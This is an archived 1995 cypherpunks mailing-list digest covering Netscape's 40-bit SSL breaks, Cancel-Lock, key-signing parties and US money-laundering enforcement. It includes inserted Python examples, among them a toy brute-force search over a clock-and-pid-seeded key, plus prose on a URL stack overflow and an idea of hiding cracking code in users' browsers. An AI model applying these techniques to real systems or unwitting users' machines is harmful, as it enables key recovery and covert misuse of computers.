From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 11 Oct 95 01:37:03 PDT
To: cypherpunks@toad.com
Subject: Elementrix POTP
Message-ID: <199510102120.RAA110954@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello again cypherpunks:

Sorry to continue "beating a dead horse" here, but I forwarded a few
C-punks' messages regarding the Elementrix "Power One-Time Pad" to
this person, and I thought you might be interested in her (somewhat
cryptic <g>) response.

Forwarded message follows:
______________________________________________________________________
>Date: Tue, 10 Oct 1995 20:34:53 +0200
>From: Maia Aron <maia@elementrix.co.il>
>To: liberty@gate.net
>Subject: Re: POTP
>
>
>Hi, it took me a little while to respond; we've been getting a lot of 
>inquiries following the Interop show.
>
>The short answer is: everything that people are guessing we are, including 
>the guesses mentioned in the cypherpunks info you attached, is not what we 
>are. I.e., it's not an autokey cipher, it's not like DES, there is no way 
>to track relationships between yesterday's and today's ciphertexts. The 
>encryption is not done by using an encryption algorithm.
>
> Unfortunately, and we really mean unfortunately, we can only reveal what 
>"it is" to people who agree to a non-disclosure arrangement while we're 
>patent pending. Otherwise we would have no problem revealing the whole 
>method. So far, every international expert who has reviewed the method 
>agrees (after many, many hours and days of trying to find holes) that POTP 
>really does what we say it does.
>
>You can share this with whomever you'd like. Sorry I can't say much more.
>
>
>
>Regards,
>
>Maia Aron
>Vice President, Marketing
>Elementrix Technologies Inc.
>850 Third Avenue
>New York, NY 10022
>
>phone: 212-888-8879
>fax:   212-935-3882
>email: maia@elementrix.co.il
______________________________________________________________________
End of forwarded message.

So, I guess we know what they *aren't*, but not what they *are*...Is
this the first example (in modern history) of encryption that's *not*
done by using an encryption algorithm, or am I just missing something?
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

-----END PGP SIGNATURE-----
Regards, Jim Ray

Ray's Corollary to Murphy's Law:
"You will be spared _NOTHING_." -- Peter C. Ray [my dad].
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>  IANAL
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Lull <lull@acm.org>
Date: Tue, 10 Oct 95 10:35:16 PDT
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Making it more difficult to forge cancels (was: Re: FORGED CANCELS of posts on n.a.n-a.m)
In-Reply-To: <199510051540.IAA23612@ix.ix.netcom.com>
Message-ID: <199510101734.KAA26687@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 09 Oct 1995 23:12:35 -0400 (EDT), dlv@bwalk.dm.com (Dr.
Dimitri Vulis) wrote:

> Scenario 3.
> 
> Alice provides dial-up Usenet feed to/from several small sites run by Bob,
> Charles, and Dan. Their domains point to Alice via MX. Alice knows that if one
> of them spams Usenet, she'll be flamed and mailbombed. Alice adds her own
> "Cancel-Lock:" to each article she receives from these sites before feeding
> them to the rest of Usenet. Later she can cancel whatever articles have
> originated at B, C, D, and passed through her site.

I like this a lot, except:

If B doesn't add a Cancel-Lock to each article he sends, he loses the
ability (because of Alice's Cancel-Lock) to cancel his own articles.
Cancel-Locks should only be added (or honored?) if the message
contains a Cancel-Lock from the originator.

I'd also like to suggest that added Cancel-Locks be generated from
something less than the full message -- perhaps from just the message
ID.  Intermediate sites are unlikely to maintain full copies of all
messages, and ought to be able to generate cancels in response to a
(possibly corrupted) copy returned to postmaster from another site.
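
Added example (not code from this thread): the two suggestions above, written out so the behaviour can be checked. It assumes a hash-commitment form of Cancel-Lock, which the message does not spell out: the lock is a hash of a key, the canceller later reveals the key, and the key is derived from a site secret and the Message-ID only. All function names, secrets and Message-IDs are constructed.

```python
import base64
import hashlib
import hmac


def _b64(raw):
    return base64.b64encode(raw).decode("ascii")


def cancel_key(site_secret, message_id):
    """Key derived from the site secret and the Message-ID alone.

    No article body is needed, so a site can regenerate the key from a
    bounced or corrupted copy as long as the Message-ID survives.
    """
    mac = hmac.new(site_secret, message_id.encode("ascii"), hashlib.sha256)
    return _b64(mac.digest())


def cancel_lock(key):
    """Public commitment to the key; publishing it does not reveal the key."""
    return _b64(hashlib.sha256(key.encode("ascii")).digest())


def originate(message_id, site_secret):
    """Headers of a new article carrying the originator's own lock."""
    lock = cancel_lock(cancel_key(site_secret, message_id))
    return {"Message-ID": message_id, "Cancel-Lock": [lock]}


def relay(headers, site_secret):
    """Intermediate site (Alice): add a lock only if the originator sent one.

    Adding a lock to an unlocked article would take away the originator's
    ability to cancel it, which is the objection raised above.
    """
    out = dict(headers)
    locks = list(headers.get("Cancel-Lock", []))
    if locks:
        key = cancel_key(site_secret, headers["Message-ID"])
        out["Cancel-Lock"] = locks + [cancel_lock(key)]
    return out


def make_cancel(message_id, site_secret):
    """Build a cancel from nothing but the Message-ID and the site secret."""
    return {"Control": "cancel " + message_id,
            "Cancel-Key": cancel_key(site_secret, message_id)}


def cancel_is_authorised(article, cancel):
    """True only if the revealed key hashes to one of the article's locks.

    Articles with no lock at all are outside this scheme and return False.
    """
    if cancel.get("Control") != "cancel " + article["Message-ID"]:
        return False
    offered = cancel_lock(cancel.get("Cancel-Key", ""))
    return any(hmac.compare_digest(offered, lock)
               for lock in article.get("Cancel-Lock", []))
```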





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Oct 95 17:37:40 PDT
To: benny@SIRIUS.COM (Thomas Gorman)
Subject: Re: Netscape Crack
Message-ID: <199510110036.RAA10457@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:30 PM 10/10/95 -0700, benny@SIRIUS.COM (Thomas Gorman) wrote:
>I'm a bit new to the Crypto Field but I know enough.  I heard that the
>Cypherpunks ran a brute force attack on Netscape's 40-Bit code but I still
>don't know how those two guys in Berkeley broke the 40-bit in just a few
>minutes.  Can someone on this list explain it to me?  Thanks.

Netscape uses a random session key, which feeds that 40-bit encryption.
How does it get a random session key without bothering the user to type
in random numbers?  By using the sources of randomness available to it,
like the system clock and process id.  Well, since you know when a message was
sent, you know what time it was (to the second), and there aren't very many
possible values of microseconds available.  There also aren't a lot of possible
processids, especially when you can run a process on the machine or convince
sendmail into telling you.  So instead of having 2^40 numbers to brute-force,
there were fewer than 2^30, often more like 2^20.  That's pretty fast.

The third crack was to notice that Netscape isn't very careful with array bounds
(in true C fashion), allowing you to push stuff on the stack by handing it a URL
with a very long name.  If you're careful, you can put interesting stuff on the
stack, so it does more than just crash in an ugly fashion.

However, three's a charm, and it's now time to Hack Microsoft, especially since
Microsoft has been saying bad things about Netscape, when almost every encryption
product in a Microsoft tool is wimpy beyond repair, and when their newest and
niftiest stuff also has 40-bit keys for export versions, without even as much salt
as Netscape used.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
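
Added example (not from Bill's message, and not Netscape's generator): a seed-space audit for a key derived from the clock and the process id, next to a key drawn from the OS random source. The toy key derivation, the function names and the sample timestamp and pid are all constructed for illustration.

```python
import hashlib
import math
import secrets
import struct


def seed_entropy_bits(usec_candidates, pid_candidates, sec_candidates=1):
    """log2 of the number of seeds an observer cannot rule out.

    The nominal key length is irrelevant once the key is a deterministic
    function of the seed: the search space is the seed space.
    """
    return math.log2(sec_candidates * usec_candidates * pid_candidates)


def toy_session_key(sec, usec, pid):
    """Constructed stand-in: a 40-bit key hashed from clock and pid only."""
    return hashlib.md5(struct.pack("<III", sec, usec, pid)).digest()[:5]


def search_seed_space(observed_key, sec, usec_range, pid_range):
    """Walk the seeds consistent with what an observer already knows.

    Returns the matching seed and how many candidates were tried, or None.
    """
    tried = 0
    for pid in pid_range:
        for usec in usec_range:
            tried += 1
            if toy_session_key(sec, usec, pid) == observed_key:
                return {"usec": usec, "pid": pid, "tried": tried}
    return None


def csprng_session_key():
    """Corrected form: all 40 bits come from the OS CSPRNG, so there is no
    small seed to enumerate and the search space is the full 2^40."""
    return secrets.token_bytes(5)


# Constructed sample: second and pid known to the observer, microseconds not.
SAMPLE_SEC, SAMPLE_USEC, SAMPLE_PID = 813_366_046, 271_828, 4_242

if __name__ == "__main__":
    print("pid known:       %.1f bits" % seed_entropy_bits(10**6, 1))
    print("pid 1 of 1000:   %.1f bits" % seed_entropy_bits(10**6, 1000))
    key = toy_session_key(SAMPLE_SEC, SAMPLE_USEC, SAMPLE_PID)
    print(search_seed_space(key, SAMPLE_SEC, range(10**6), [SAMPLE_PID]))
```

With the second and pid known, the seed carries just under 20 bits; with the pid narrowed to a thousand candidates it stays under 30, which is the range the message gives.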





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 10 Oct 95 16:06:07 PDT
To: jpb@miamisci.org (Joe Block)
Subject: How to hold a key signing party?
In-Reply-To: <v01520c00aca09a7cd770@[199.227.2.175]>
Message-ID: <9510102259.AA28745@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Joe Block writes:
 > What I have in mind is to have everyone who is planning on attending send
 > me their key and its fingerprint....
 > 
 > This seems like a lot of work, which I don't mind, but if there is a more
 > efficient method, I'd like to know about it.

Doesn't make any difference to me, you nefarious agent of the Great
Man In The Middle you.



[ You got to get up *pretty early in the morning* to put one over on
*me* like that. ]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Tue, 10 Oct 95 15:00:39 PDT
To: cypherpunks@toad.com
Subject: How to hold a key signing party?
Message-ID: <v01520c00aca09a7cd770@[199.227.2.175]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've never attended a key signing party so I'd like to get some input on
the most effective way to run one.

What I have in mind is to have everyone who is planning on attending send
me their key and its fingerprint.  I'll collate the lot and print enough
copies of the list of names/fingerprints so that once everyone shows up,
each person can get a handout.  Everyone presents ID showing who they are
and reads off their fingerprint so the attendees can check them on their
handout.  Afterwards, I'll email all attendees the keys so they can sign
them and mail them back to me.  Once I receive the signed keys, I'll
redistribute them back to the owners & attendees.

This seems like a lot of work, which I don't mind, but if there is a more
efficient method, I'd like to know about it.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

signoff
2048bit-Fingerprint: 74 64 C7 6F 51 72 36 3D 87 75 F9 F5 2A F6 8F 74
------------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael G. Reed" <reed@itd.nrl.navy.mil>
Date: Tue, 10 Oct 95 15:28:25 PDT
To: cypherpunks@toad.com
Subject: Netscape & Fortessa
Message-ID: <9510102227.AA05494@usonian.itd.nrl.navy.mil.>
MIME-Version: 1.0
Content-Type: text/plain


All-
	I remember there was some talk about Netscape adding Fortessa support
on here a couple of days ago, so I thought I'd share this.  Marc Andreessen
(president of technology for Netscape Communications) made a presentation
today at the 18th National Information Systems Security Conference about
Fortessa support within Netscape 2.0 to be shipping Beta Q2 '96 and final
the second half of '96 (I haven't seen an official press release, but he more
or less said they were announcing it today).  From his description, it looks
like they are going to place the Fortessa drivers right in the SSL layer
bypassing the software subsystem that currently exists in favor of the
hardware (the software subsystem would still be utilized for non-Fortessa
sessions).  He also commented that this was possibly a lead-in to other
hardware subsystems in the future.  General reaction (at least in my
immediate vicinity in the lecture hall) was quite positive -- looks like
Fortessa is gaining even more momentum (Oracle had a talk about Fortessa
support immediately after Netscape).  I wonder when Microsoft & company will
jump on the bandwagon? :-)

-Michael

 (The above statements are my opinions and do not necessarily represent the
  opinions of the Department of Defense, the US Navy, or the Naval Research
  Laboratory.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 10 Oct 95 15:46:31 PDT
To: jpb@miamisci.org (Joe Block)
Subject: Re: How to hold a key signing party?
In-Reply-To: <v01520c00aca09a7cd770@[199.227.2.175]>
Message-ID: <199510102246.SAA12947@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Joe Block writes:
> What I have in mind is to have everyone who is planning on attending send
> me their key and its fingerprint.  I'll collate the lot and print enough
> copies of the list of names/fingerprints so that once everyone shows up,
> each person can get a handout.  Everyone presents ID showing who they are
> and reads off their fingerprint so the attendees can check them on their
> handout.  Afterwards, I'll email all attendees the keys so they can sign
> them and mail them back to me.  Once I receive the signed keys, I'll
> redistribute them back to the owners & attendees.

What you describe is the method we use at IETF meetings (we always
have key signing parties) and it is about as efficient as you can hope
for. The one proviso I'll add is that you really don't need people to
show ID -- that's up to the people signing the keys...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Santiago de la Paz <garnett@wombat.catbelly.com>
Date: Tue, 10 Oct 95 18:13:55 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
In-Reply-To: <199510101550.QAA29289@utopia.hacktic.nl>
Message-ID: <199510110113.TAA08320@wombat.catbelly.com>
MIME-Version: 1.0
Content-Type: text/plain



> Often files retrieved include e-mail thought to have been
> erased long ago. It survives because the diligent
> computer system manager makes backup tapes of everything
> on the system every night, then stores those tapes for
> years.

Uh... they back up their *mail* spools?  Yeah, right.

~james




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Tue, 10 Oct 95 18:17:12 PDT
To: Travis Corcoran <tjic@OpenMarket.com>
Subject: Re: truth in advertising: Netscape 1.1 on security
In-Reply-To: <199510101534.LAA22081@cranmore.openmarket.com>
Message-ID: <Pine.LNX.3.91.951010191532.545A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> I ran 'strings' on the binary, and only got one "about.*security" reference.
> 
> entering it as an URL
> 		
> 		about:security
> 
> yields the ironically humorous (when you consider all of the security bugs):
> 
> 		Whatchew talkin' 'bout, Willis?


this happens when anything other than what is defined by the program is 
entered.  ie, about:time would give the same result.

my 'home' page is this about:mozilla.

ciao,

- -pjf


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 10 Oct 95 19:32:50 PDT
To: cypherpunks@toad.com
Subject: Int'l Money Laundering, Part the Second
Message-ID: <v02120d04aca0b23db407@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



INTERNATIONAL ASPECTS
The increasingly long arm of US law

Those of you who have read my earlier exploration on the subject
of jurisdiction (http://www.communities.com/paper/swamp.html)
should be aware of a wide variety of ways that the US can "reach
out and touch someone" they're not pleased with.

Well, last week, I learned a few more.

There are several ways in which the US is attempting to exert
hegemony throughout the world wrt banking regulation:

  o Identification of "fiscally tolerant" nations and banking
    havens, and close regulatory examination of all transactions
    with these countries.

  o Pressure on major US trading partners and allies to pass
    and implement anti-money-laundering legislation and
    regulatory regimes.

  o Regulations on foreign banks with offices in the US, making
    compliance demands on world-wide operations.

  o Criminal prosecution of banks suspected of institutional
    involvement in money laundering, even if said bank has no
    offices or branches in the US.

  o Worldwide pre-trial substitute asset forfeiture of banks
    suspected of institutional involvement in money laundering,
    even if said bank has no offices or branches in the US.


Pariah Nations in Banking
=========================

As I touched on briefly in the previous section, transactions
with well-known banking havens can automatically qualify as
"suspicious." And in addition to some of the better known havens,
a number of countries were pointed out at the conference as
being "fiscally tolerant", including Malta, Uruguay, Japan,
Ireland and Belgium; in another presentation the countries of
Eastern Europe and the former Soviet Union were identified as
"rapidly growing" sources of suspicious banking activity.

Transactions with counterparties in such countries will be flagged
by regulators for closer examination -- banks with large percentages
of transactions with these countries will be expected to meet a
higher standard in their attempt to identify "suspicious" behavior
and will be under increasing pressure to investigate their customers'
business practices and motivation for all bank transactions.

Some countries are clearly going to continue to tell the US to
"get stuffed." However, if the US is successful in pressuring more
and more countries to "toe the line", it will leave a shrinking
pool of transactions subject to closer and closer examination.


New Money Laundering Legislation
================================

Two presentations, one from Taiwan, the other from Thailand,
focused on new or proposed legislation wrt money laundering in
those countries. Based on my direct experience of living in the
former, and my research into the latter, it's going to be a very,
very long time before such legislation has a significant
impact on either country.

Chinese people (who are in the majority in Taiwan, and form
an economically active minority in Thailand) are very cash-
oriented; I vividly remember payday in Taiwan, with the boss
sitting at a table piled with money, bundling up salaries for
everyone. I'd come home at the end of each month with a giant
wad of cash from my several different jobs. One could hardly
imagine a better environment for money laundering than a society
in which large quantities of cash change hands on a regular basis.
After his talk, the Taiwanese speaker acknowledged the problems,
but seemed hopeful that progress could be made.

The speaker from Thailand, Nualnoi Treerat, a professor of
Economics, discussed the proposed legislation primarily as an
attempt to reduce the impact of organized crime on
political life and society in Thailand; however, by her own
estimations, the underground economy in Thailand represents
17-19% of the country's GDP (mostly drugs and prostitution.)
Given the extensive corruption which she also detailed, it
seems that such legislation will be a very small step indeed.

Other speakers addressed the issue of cultural differences
with respect to the use of cash and attitudes towards privacy,
and it came up at lunch both days -- in many cultures, financial
privacy is held in much higher regard than in the US, and people
have a much stronger suspicion towards the government. Furthermore,
there are many people who feel this way in the US. There is going
to be an inevitable clash between attempts to closely regulate
and monitor money movements and people's fundamental desire for
privacy. It's not clear that people of any culture can be sufficiently
frightened by the bad guys to give up as much of their privacy as
would be required for ultimate success in the War on Money Laundering.

Despite the dim chances of success, it's clear that the US has
been at least partially successful in coercing and coaxing other
countries to adopt measures against money laundering, and to
some extent there is local support for these measures. But these
direct efforts pale by comparison to some other techniques...


Foreign Bank Regulation
=======================

In various pro-privacy publications I've read, there have been
oblique warnings about doing business with foreign banks that
maintain offices in the US. At this conference, I learned some
very concrete reasons for this.

It turns out that if a foreign bank wants to open a US office,
they must demonstrate compliance with US money laundering laws
throughout their _worldwide operations_. Furthermore, they're
expected to have solid leadership for these policies from their
home offices.

This puts such banks in a serious bind. For instance, while
Annunzio-Wylie absolves (or attempts to absolve) banks from civil
liability for filing Suspicious Activity Reports and Criminal
Referral Forms on their customers, this absolution does not extend
to the home countries of these banks, where substantially different
laws may obtain -- possibly explicitly forbidding this kind of
reporting.

There is almost a certain kind of logic to this kind of activity,
but not content to extend our laws over the worldwide operations
of banks with US offices, there are two ways in which US authorities
are now attempting to extend US laws to banks _with no US offices_.


Extraterritorial Reach
======================

The best paper presented at the conference, hands down, was
"Surviving the Solution: The Extraterritorial Reach of the
United States," by Kirk Munroe, a criminal defense attorney
practicing in Miami. [I intend to find out if an online
version of this paper can be made available.]

To quote Mr. Munroe:

  The US money laundering law specifically provides for
  extraterritorial jurisdiction when (a) the conduct is by a US
  citizen anywhere in the world, or, if by a non-US citizen,
  the conduct occurs, at least in part, in the United States,
  and (b) the transactions, or a series of related transactions,
  exceeds $10,000. [18 USC § 1956(f)]

Some add'l background: banks involved in international business
typically have a number of _correspondent accounts_ scattered
around the world that are used for clearing wire transfers and
other transactions. Since the BCCI scandal, the US government
has increasingly gone after these accounts when a bank is
suspected of facilitating money laundering.

Furthermore, banks can have these correspondent accounts seized,
even if they no longer contain "dirty" money, because they
_facilitated_ a money laundering activity.

When you combine these elements, you get a strategy that
permits the US government to confiscate worldwide correspondent
accounts of banks, even if they don't have a US presence.

The first case Mr. Munroe cites is that of Banco de Occidente
(Panama), one of his clients, that was alleged to have facilitated
the laundering of the proceeds of drug transactions. The indictment
included criminal charges against the banks and a criminal
forfeiture charge. The government also filed a civil action for
the forfeiture of $412 million allegedly laundered (although it
had already passed completely through the bank.)

The government then proceeded to freeze not only the bank's US
correspondent accounts, but also accounts in Germany, Switzerland
and Canada, leading to the insolvency of the bank and its subsequent
takeover by the Panamanian Banking Commission. [The Germans quickly
unfroze the account after a civil action brought by the bank.]

Quoting Munroe:

  After months of difficult and complicated negotiations which
  involved the banks' various interests in eight nations, a
  resolution was reached with the governments of the US, Canada,
  and Switzerland... [the bank] entered a guilty plea and agreed
  to forfeit, over a period of four years, $5 million to the US.
  The US, in turn, paid the Swiss and the Canadians $1 million
  each from the initial $2 million forfeiture payment.

[Those of you who are still under any delusions about the "safety"
of Swiss bank accounts, take careful note of this.]

Mr. Munroe concludes that the only reason that the bank got off
this "lightly" was because of substantial evidence that it was,
by and large, a highly respectable institution and that this
instance of laundering was an aberration.

The next case cited by Mr. Munroe is that of Bank Leu. I quote
from his paper:

  In sum, a Luxembourg bank with no office in the US was charged
  and convicted of money laundering in the US on the basis of
  clearing US dollar negotiable instruments drawn on a US bank but
  deposited by non-US citizens in Luxembourg. In other words,
  acceptance of US-dollar negotiable instruments by a bank anywhere
  in the world outside of the US renders the bank susceptible
  to US criminal jurisdiction in the money laundering field.

The case boils down to this: Bank Leu wanted to expand its private
banking business, and hired an officer to market accounts in
South America. Two related accounts were opened, and over a one-
year period $2.3 million in cashier's checks, all below $10K,
were deposited in the two accounts.

Although no guilty knowledge could be shown, this case was pursued
and won on a theory of "willful blindness", that is, the bank "should
have known" that the transactions had no valid business purpose
and were inherently suspicious (came via Colombia, were sometimes
more than 6 months old, all in small amounts, etc.). According to a
LEA representative at the conference, there was a lot of joking in
the backoffice at Bank Leu about the money being dirty, and clerks
were repeatedly told "don't worry, it's ok" by bank officers.
Certainly if this is true, it amounts to _extremely_ willful
blindness, but this case still represents an amazingly long reach
for US laws.

[more to come... "Things bad people do with money"]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 11 Oct 95 01:07:01 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Internet, the cracking machine
In-Reply-To: <9510101354.AA05988@outland>
Message-ID: <Pine.SUN.3.91.951010185952.22710A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, Mike Fletcher wrote:

> 
> Well, security bugs aside (and I've got the sun4.1.3_u1 and Win32 ns2b
> distributions :) has anyone given any thought to using Java to do some
> sort of Chinese Lottery attack.  I was re-reading App. Crypto. last
> night and it could be feasible.  If you could get your key cruncher
> thread loaded into a good many browsers to run when idle . . . .  How
> many estimated copies of NS are there?  Anyone want to do the math? :)

Ok, I'll bite.  Let's figure out how many MIPS years it takes to brute force 
various keylengths (assuming 100 instructions per key):
56: 2e3
64: 6e5
80: 4e10
128: 1e25

Andrew M. Odlyzko in his paper "The Future of Integer Factorization" 
estimates the computing power of the Internet at 3e7, and the number of
MIPS years to factor a 1024 RSA key to be 3e11.  I think both numbers are
probably off by a factor of 10 - Internet's computing power is probably
closer to 3e8 and MIPS years to factor 1024-bit key may be closer to 3e10. 

So assuming that you can get the entire Internet to help you, the amount 
of time it takes for various attacks is:

brute force keys of bit
56: 4 minutes
64: 1 day
80: 130 years
128: 3e16 years

factor RSA keys of bit
512: 20 minutes
768: 50 days
1024: 100 years
2048: 1e11 years

If you are reading this from an archive, divide the brute force numbers by
4**(your current year-1995), and the factoring numbers by 8**(your current
year-1995), for a factor of 2 improvement per year in each of the
following: average CPU power, number of computers on the Internet, and
factoring algorithm. 

(Note that the above estimates are meant to err on the low side.  I would
be VERY surprised if anyone actually manages to accomplish any of the
above attacks in the amount of time given.)

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Tue, 10 Oct 95 17:00:28 PDT
To: Ironwolf@Minotaur.com (Robert McNally)
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <v01530500ac919ccd39d8@[198.81.209.45]>
Message-ID: <m0t2oaJ-0009yvC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


I like it...

I'll point out that there's nothing wrong with having an alias, dba for
those situations where it might be advantageous.

Of course, calling it a sister org, etc. could have advantages.

Or maybe just call the ideal/culture cypherpunks and create a
slightly more structured org for span...


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Recently Peter Trei <trei@process.com> called for new names and slogans to
> replace the negatively loaded name "Cypherpunks." Here is one effort
> (partially based on his suggestion, but with refinements.) Note that I
> intend the term "strong privacy" to include both cryptography-based tools,
> and other tools such as remailers. I hereby place the following into the
> public domain.
> 
> * * *
> 
> I lock my car.
> I secure my house.
> I send my letters in envelopes.
> I store my valuables in safe places.
> I don't let strangers hold my wallet.
> I don't wear a name tag everywhere I go.
> I carry my cash and credit cards out of sight.
> I don't show off my key number when visiting the ATM.
> 
> I protect my e-mail and files with strong privacy tools.
> 
> Don't you?
> 
> 
> A message from SPAN: the Strong Privacy Advocates Network
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBMGvwfwsQtf7CdTI1AQFSGwP9HWusresWaRsQig2fSNW/nXt+oKVv6Np7
> 5EuziM3v1ihP4Clr4dqUtEE+Yujf7o71I7nb1UrVvwpIOt5yWXtiZc2/5VPZFBUY
> bTUHlQ/NkgKum9RMnntb8BprtpiTSrb+o2s9iYDJLfFnCeT8n2zEn97GgandKA2o
> rbXWVIEKSpc=
> =mBAk
> -----END PGP SIGNATURE-----
> 
> -------------------------------------------------------------------------
> NOTE: Currently travelling on sabbatical. Expect responses within 7 days.
> -------------------------------------------------------------------------
>                    ROBERT McNALLY - MINOTAUR CONSULTING
>                    Ironwolf@Minotaur.com * 714/648-2248
>     Specializing in Computer Games and Digital Entertainment Software
>  Over 15 Years of Industry Experience: Creative * Technical * Managerial
> -------------------------------------------------------------------------
> 
> 
> 


-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.:Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Tue, 10 Oct 95 17:57:49 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: NSA Realists v. Nuts
In-Reply-To: <Pine.SUN.3.91.951009191126.845B-100000@panix.com>
Message-ID: <9510110057.AA07735@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Mon, 9 Oct 1995 19:24:06 -0400 (EDT)
    From: Duncan Frissell <frissell@panix.com>
    
    2400 Americans are imprisoned every year for federal income tax 
    violations.  Approximately one person is killed every year in arrests 
    involving federal income tax violations.

*This* is the blood of millions you spoke of?!?  Oh please . . . .

Considering that you launched into this as a comparison to the Nazi
`medical experiments' I can only conclude that you're hopelessly out
of touch with anything similar to reality.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Tue, 10 Oct 95 13:07:35 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Hal's Third Challenge?
In-Reply-To: <199510101920.PAA24628@panix.com>
Message-ID: <"swan.cl.cam.:012510:951010200606"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Any movement towards a third cracking session.  I know poor Netscape seems
> like old hat but it might be good to do one more to establish a working
> server (if we have one).

Indeed -- with the time to crack down to a few seconds using cryptanalytic
instead of brute, and netscape moving to 128 bit, there seemed little point in
going for netscape again.

It seems that microsoft was the one to go for, as they too use 40 bit for
each session ....  If someone can generate the CRACKing code and someone can
donate an example, I'd be DELIGHTED to arrange another BRUTE !


PS: any non US people willing to test my PGP "Multi Protocol fast lookup"
    as per http://www.pgp.net/pgp/ ? I'd like to see how fast it is from
    distant parts (at 0.3 - 0.6 s real time locally, network delays will
    be significant ...)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: userview@mindspring.com (Anne Giles)
Date: Tue, 10 Oct 95 18:21:01 PDT
To: cypherpunks@toad.com
Subject: recent crime bill
Message-ID: <199510110120.VAA06713@dylan.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm sorry about the noise but does anyone know where on the net I can find a
copy of the recent crime bill and the anti-terrorism act?

Thanks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Tue, 10 Oct 95 21:17:46 PDT
To: tjic@OpenMarket.com
Subject: Re: truth in advertising: Netscape 1.1 on security
Message-ID: <9510110414.AA05438@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Travis Corcoran <tjic@OpenMarket.com>
> 
